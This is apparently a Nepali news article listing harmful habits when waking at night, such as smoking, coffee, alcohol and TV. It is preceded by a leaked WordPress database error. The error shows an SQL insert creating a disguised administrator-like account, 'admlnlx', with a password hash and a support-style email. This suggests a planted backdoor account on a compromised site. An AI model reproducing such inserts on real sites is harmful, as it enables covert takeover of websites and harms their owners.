WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bl.O5ud3wzXphHKBG6M..IdO9tWDn5/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 05:36:38', '', 'admlnlx', 'admlnlx')
एजेन्सी,पुस ५-
धेरैको राति कुनै न कुनै समय निन्द्रा खुल्छ । त्यो समयमा अनेक काम गर्छन् । तीमध्ये निम्न काम प्रायः धेरैले गर्छन् जुन गर्दै नगरेको राम्रो हुन्छ ।
चुरोट पिउनेः निकोटिनले निन्द्रामा ठूलो प्रभाव पार्छ । निकोटिन लिइएको कति घण्टासम्म फेरि निद्रा नआउने समस्या छ । चुरोट पिउन नै राम्रो होइन, त्यसैमाथि मध्यरातमा चुरोट पिउनु त झन् धेरै हानिकारक हुन्छ ।
कफी सेवनः चिया वा कफी मध्यरात पिउने पनि गरिन्छ । यो पनि स्वास्थ्यका लागि उपयुक्त ठानिदैन । कफीले केही घन्टाका लागि निन्द्रा भगाइदिने भएकाले पनि यो बानी सही होइन ।
खानेकुरा खानेः कहिलेकाहिँ राति उठ्दा भोक लागेको महुसस भएर केही खानेकुरा खोने पनि गरिन्छ । तर, यो पनि स्वास्थ्यका लागि राम्रो होइन । किनकि यसले मोटोपन बढाउन सक्छ ।
टिभी हेर्नुः निन्द्रा लागेन भने एकछिन टिभी हेरौंन भन्ने धेरैलाई लाग्छ । तर, टिभीले निन्द्रा झन् खराब गरिदिन्छ । एक त त्यसपछि आउने सपनामा समेत त्यही टिभीमा देखिने कुराहरु आउँदा ज्यान थकित महसुस हुन्छ । यसले दिमागको थकाई मेट्न दिँदैन ।
कामका बारे सोच्नुः धेरैले उठिसकेपछि कामका बारे सोच्ने वा गर्न थाल्ने गर्छन् । यो त झन् ठूलो खराब बानी हो । किनभने राति कामबाट आराम पाइएन भने दिउसो समेत काम गर्ने मुड नचल्न सक्छ ।
रक्सी पिउनेः निन्द्रा लागेन वा गहिरो निन्द्राका लागि भनेर धेरैले रक्सी पिउने गरेका हुन्छन् । यदि मध्ये राति मदिरा पिइयो भने बिहानसम्म त्यसको खराब असर हुन्छ । त्यो दिनभर यसैको ह्याङओभरमा बित्छ ।